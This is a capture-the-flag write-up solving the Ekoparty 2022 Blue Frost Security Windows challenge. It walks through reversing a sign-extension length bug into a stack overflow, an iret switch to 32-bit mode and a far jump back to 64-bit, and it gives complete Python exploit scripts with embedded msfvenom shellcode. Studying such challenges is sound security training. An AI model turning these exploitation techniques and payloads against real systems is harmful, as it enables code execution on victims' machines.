Post

Ekoparty 2022 BFS Windows Challenge

Ekoparty 2022 BFS Windows Challenge

In this blog post, we will solve the Windows userland challenge that Blue Frost Security published for Ekoparty 2022. You can find the challenge & description here:

We analyze the bfs-eko2022.exe binary in IDA and can see that it’s binding to 0.0.0.0 on port 31415. After a client connects, it calls sub_140001160 which is checking that the first 6 bytes received are Hello\x00. If that’s the case, it will send back Hi\x00 and proceeds to call sub_140001240 where the main packet parsing is done. At the start of this function, it fills a heap buffer as seen below:

We can see 0x5050505050505050 being written followed by 0xcf58585858585858. This is repeated over the full length of the buffer (0x1000). At the beginning of the main function we can see how this buffer is allocated:

1
2
3
4
5
mov     r9d, 40h        ; flProtect
mov     r8d, 3000h      ; flAllocationType
mov     edx, 1000h      ; dwSize
mov     ecx, 10000000h  ; lpAddress
call    cs:VirtualAlloc

This buffer that is being filled is on the heap at 0x10000000 , read, write, and executable, and has a size of 0x1000. This shows that the initialization being done is filling the complete buffer. These initialization values are suspicious as you would normally expect a null initialization or random data. If we disassemble the bytes we get the following instructions:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0:  50                      push   eax
1:  50                      push   eax
2:  50                      push   eax
3:  50                      push   eax
4:  50                      push   eax
5:  50                      push   eax
6:  50                      push   eax
7:  50                      push   eax
8:  cf                      iret
9:  58                      pop    eax
a:  58                      pop    eax
b:  58                      pop    eax
c:  58                      pop    eax
d:  58                      pop    eax
e:  58                      pop    eax
f:  58                      pop    eax

This does not look random at all and will play a role later on. For now, let’s continue to follow the control flow of the packet parsing function. After the handshake and initialization, it receives more bytes, looking for a magic value 0x323230326F6B45 followed by the byte T which indicates the packet type. It then expects another 4 bytes that represent the packet length.

1
2
3
4
5
6
7
8
9
10
11
12
13
mov     rax, 323230326F6B45h
cmp     qword ptr [rsp+0F68h+buf], rax
jz      short loc_140001339
|
movzx   eax, [rsp+0F68h+var_20]
mov     [rsp+0F68h+var_38], al
movsx   eax, [rsp+0F68h+var_38]
cmp     eax, 54h ; 'T'
jz      short loc_140001366
|
movsx   eax, [rsp+0F68h+var_1F]
cmp     eax, 0F00h
jle     short loc_140001386

The packet length comparison at the end looks interesting. It’s supposed to make sure that the packet length field can not be larger than 0xf00. Before the comparison, it’s loading the value with movsx into EAX which is move with sign-extension. This means if we would send 0xffff it would get extended to 0xffffffff and be interpreted as a negative value. Since the last jump has to be taken and -1 is lower than 0xf00 we pass the check and can continue!

Continuing at 140001386 another receive is called, reading network input data into the heap buffer at 0x10000000. The maximum amount of data we can provide here is 0x1000, since anything more than that would go outside the allocated memory and cause an exception. It is then calling sub_1400011B0 on this data.

This function is now taking the data from the heap and copying it onto the stack, using the length we have provided inside the packet itself! Remember that the intended maximum length is 0xf00 but we were able to provide 0xffff instead. This leads to a stack overflow. Another thing this function is doing is filtering out 0x2b and 0x33 while doing to copy operation, replacing them with null bytes on the stack (this will be important later).

After the copy function is finished it will once again check that the packet type is T from the copy of the data that is now on the stack. If that’s the case (which it is if used normally) it will echo back the data it received and exit. By using our stack overflow, we can however overwrite the T on the stack with an X which leads to a win-function:

1
2
3
4
5
6
7
8
9
10
movsx   eax, [rsp+0F68h+var_38]
cmp     eax, 58h ; 'X'
jnz     short loc_140001474
|
mov     rcx, cs:buf
add     rcx, rax
mov     rax, rcx
mov     cs:off_14000C000, rax
lea     rcx, [rsp+0F68h+CmdLine] ; lpCmdLine
call    cs:off_14000C000

If we can get to this last basic block the program will jump exactly to length+1 of input buffer on the heap which contains the bytes that have been written during initialization. At this point, we control the stack to some extent and can influence to which exact byte of the pre-initialized heap memory we jump. The following PoC brings us to this point.

Poc 0x01

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/usr/bin/env python3
import sys, socket, struct
p32 = lambda x: struct.pack('<I', x);

TARGET = '127.0.0.1'
PORT = 31415

sc = b""

p=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p.connect((TARGET,PORT))

# handshake
p.send(b"Hello\x00")
p.recv(3) # Hi\x00

buf =  b""
buf += b"Eko2022\x00" # magic value  
buf += b"T" # packet type
buf += b"\xff\xff" # sign/type confusion


iret = b""
iret += p32(0x41414141) 	
iret += p32(0x42424242) 			
iret += p32(0x43434343) 	
iret += p32(0x44444444) 	
iret += p32(0x45454545)	

buf += iret
buf += sc
buf += b"A"*(0x0f00-len(iret)-len(sc))
buf += b"X" # X leads to packet type confusion
buf += b"B"*0x07 # we want pops, avoid pushs
p.send(buf)
p.recv(1)
p.close() 

When we break on the call instruction we can see that we land on the heap and can single step until the iret instruction. Note that we chose the input length in a way we avoid the pushs and land right at the pops in order to fully control the stack at the moment iret is called.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
bp bfs_eko2022+0x146E
g
Breakpoint 0 hit
bfs_eko2022+0x146e:
00007ff7`c7f2146e ff158cab0000    call    qword ptr [bfs_eko2022+0xc000 (00007ff7`c7f2c000)] ds:00007ff7`c7f2c000=0000000010000f08
0:000> t
00000000`10000f08 58              pop     rax
0:000> p
00000000`10000f09 58              pop     rax
0:000> 
00000000`10000f0a 58              pop     rax
0:000> 
00000000`10000f0b 58              pop     rax
0:000> 
00000000`10000f0c 58              pop     rax
0:000> 
00000000`10000f0d 58              pop     rax
0:000> 
00000000`10000f0e 58              pop     rax
0:000> 
00000000`10000f0f cf              iretd
0:000> dd rsp
00000000`005eeb50  41414141 42424242 43434343 44444444
00000000`005eeb60  45454545 41414141 41414141 41414141

At this point, we have to do some digging on how iret works to see if we can craft the stack in a way that would let us gain (custom-) code execution. The iret instruction is used to return control from an exception or interrupt handler and is expecting the following values on the stack (very good article on this topic):

1
2
3
4
5
- new instruction pointer
- new code segment selector (CS)
- new value of EFLAGS register 
- new stack pointer
- new stack segment selector (SS)

As for the instruction pointer and stack pointer we could just point them into our heap buffer since we control a large part of it. The EFLAGS register we can get from debugging and then attempt to use the same value. This leaves us with CS and SS which is a bit tricky. CS and SS are used to index into the Global Descriptor Table (GDT) which has descriptors for kernel code/data and user code/data. Using WinDBG as a kernel debugger we can see which indices match which descriptor:

1
2
3
4
5
6
7
8
0: kd> dd @gdtr
fffff807`39e95fb0  00000000 00000000 00000000 00000000
fffff807`39e95fc0  00000000 00209b00 00000000 00409300
fffff807`39e95fd0  0000ffff 00cffb00 0000ffff 00cff300
fffff807`39e95fe0  00000000 0020fb00 00000000 00000000
fffff807`39e95ff0  40000067 39008be9 fffff807 00000000
fffff807`39e96000  00003c00 0040f300 00000000 00000000
fffff807`39e96010  00000000 00000000 00000000 00000000

The first 16 bytes are reserved, following those we can see that there are some values at offset 0x10 and 0x18:

1
2
3
4
5
6
7
8
9
10
0: kd> dg 0x10
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0010 00000000`00000000 00000000`00000000 Code RE Ac 0 Nb By P  Lo 0000029b
0: kd> dg 0x18
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0018 00000000`00000000 00000000`00000000 Data RW Ac 0 Bg By P  Nl 00000493

These should be the entries for the kernel. Then we have 2 more values following:

1
2
3
4
5
6
7
8
9
10
0: kd> dg 0x20
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0020 00000000`00000000 00000000`ffffffff Code RE Ac 3 Bg Pg P  Nl 00000cfb
0: kd> dg 0x28
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0028 00000000`00000000 00000000`ffffffff Data RW Ac 3 Bg Pg P  Nl 00000cf3

These are the user code and stack descriptors ranging from 0 to 0xffffffff. The 2 least significant bits of the selector value are being used for RPL (Requested Privilege Level) or CPL (Current Privilege Level). Because we are looking to stay in ring3 we have to set these to 1 – so 0x20 for the code segment becomes 0x23 and 0x28 becomes 0x2b.

CS and SS are only used in 32-bit mode (see: https://nixhacker.com/segmentation-in-intel-64-bit/) or lower – by supplying values there for our iret we will switch to 32-bit mode. With this bit of theory out of the way we still have a problem: 0x2b is a bad byte and will not end up on the stack! So we can choose 0x23 for the code segment but have to be creative on what to use for the stack segment.

Any value that will not crash on iret is fine in theory so it has to be Data RW but we don’t necessarily need a valid stack base and limit if we can avoid using the stack. After inspecting more values and seeing which ones do and don’t crash we eventually find 0x53:

1
2
3
4
5
0:000> dg 0x53
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0053 00000000`0060a000 00000000`00000fff Data RW Ac 3 Bg By P  Nl 000004f3

From the output, we can see that base and limit are not really useful for us but if we avoid the stack we should be fine (base and limit are also somewhat random and can change at reboots). Now it’s time to update the PoC:

Poc 0x02

1
2
3
4
5
6
7
8
9
10
11
12
...
sc =  b""
sc += b"\xcc"
sc += b"\x90"*100
...
iret = b""
iret += p32(0x10000014) 	
iret += p32(0x23) 			 
iret += p32(0x00010202) 	
iret += p32(0x10000400) 	
iret += p32(0x53)
...

Debugging the new PoC shows that we indeed end up in 32-bit mode inside our shellcode and can execute it!

1
2
3
4
5
6
7
8
9
10
11
0:000> 
00000000`10000f0f cf              iretd
0:000> dd rsp
00000000`00cfede0  10000014 00000023 00010202 10000400
00000000`00cfedf0  00000053 41414141 41414141 41414141
0:000> g
10000014 cc              int     3
0:000:x86> p
10000015 90              nop
0:000:x86> p
10000016 90              nop

Any attempt to use the stack will however fail (Note that WinDBG will automatically repair 0x53 back to 0x2b if you are single stepping – this can be confusing!). This means we will need to find a way to use the ability to execute shellcode to restore either stack functionality or get back to 64-bit.

As it turns out there is exactly such a thing. By using a far jump like this 0x33:0x100000xx we can specify 0x33 as the new code segment which will get us back to 64-bit. Since 64-bit does not need a stack segment selector we can now use the stack again! The only thing left to do (besides generating valid shellcode) is to restore the stack pointer. Luckily debugging shows that RCX still holds a reference to the stack so we can just copy it into RSP. After executing the jump into 64-bit mode we can now continue to execute 64-bit shellcode to restore the stack and then anything we like:

PoC_0x03

1
2
3
4
5
6
7
...
sc =  b""
sc += b"\xcc"
sc += b"\xea\x1c\x00\x00\x10\x33\x00" # from 0x10000014 0x1000001c
sc += b"\x48\x89\xC8\x48\x89\xC4" # restore original stack from ref in rcx
sc += b"\xcc"
...

Note that even though 0x33 is a bad byte this is only true for the stack – on the heap where the shellcode lies it will be unchanged. Debugging shows the swap back to 64-bit:

1
2
3
4
5
6
7
8
9
10000014 cc                      int     3
0:000:x86> p
10000015 ea1c0000103300          jmp     0033:1000001C
0:000:x86> p
00000000`1000001c 4889c8          mov     rax,rcx
0:000> p
00000000`1000001f 4889c4          mov     rsp,rax
0:000> 
00000000`10000022 cc              int     3

For the final exploit, all that is left to do is generate some shellcode, e.g. msfvenom -p windows/x64/exec cmd="calc" -f python .

Final PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#!/usr/bin/env python3
# Author: @xct_de

import sys, socket, struct
p32 = lambda x: struct.pack('<I', x);

TARGET = '127.0.0.1'
PORT = 31415

sc =  b""
#sc += b"\xcc"

sc += b"\xea\x1c\x00\x00\x10\x33\x00" # from 0x10000014 (x86) 0x1000001c (x64)
sc += b"\x48\x89\xC8\x48\x89\xC4"     # restore original stack from rcx

# msfvenom -p windows/x64/exec cmd="calc" -f python
sc += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51"
sc += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
sc += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
sc += b"\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
sc += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
sc += b"\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
sc += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
sc += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
sc += b"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
sc += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
sc += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
sc += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
sc += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
sc += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
sc += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
sc += b"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48"
sc += b"\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d"
sc += b"\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5"
sc += b"\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
sc += b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
sc += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89"
sc += b"\xda\xff\xd5\x63\x61\x6c\x63\x00"

p=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p.connect((TARGET,PORT))

# handshake
p.send(b"Hello\x00")
p.recv(3) # Hi\x00

buf = b""
buf += b"Eko2022\x00" # magic value  
buf += b"T" # packet type
buf += b"\xff\xff" # sign/type confusion

# switch from 64-bit to 32-bit via iret
iret = b""
iret += p32(0x10000014) 	
iret += p32(0x23) 			  
iret += p32(0x00010202) 	
iret += p32(0x10000400) 	
iret += p32(0x53)			    

buf += iret
buf += sc
buf += b"A"*(0x0f00-len(iret)-len(sc))
buf += b"X" # X leads to packet type confusion
buf += b"B"*0x07 # we want pops, avoid pushs
p.send(buf)
p.recv(1)
p.close() 
This post is licensed under CC BY 4.0 by the author.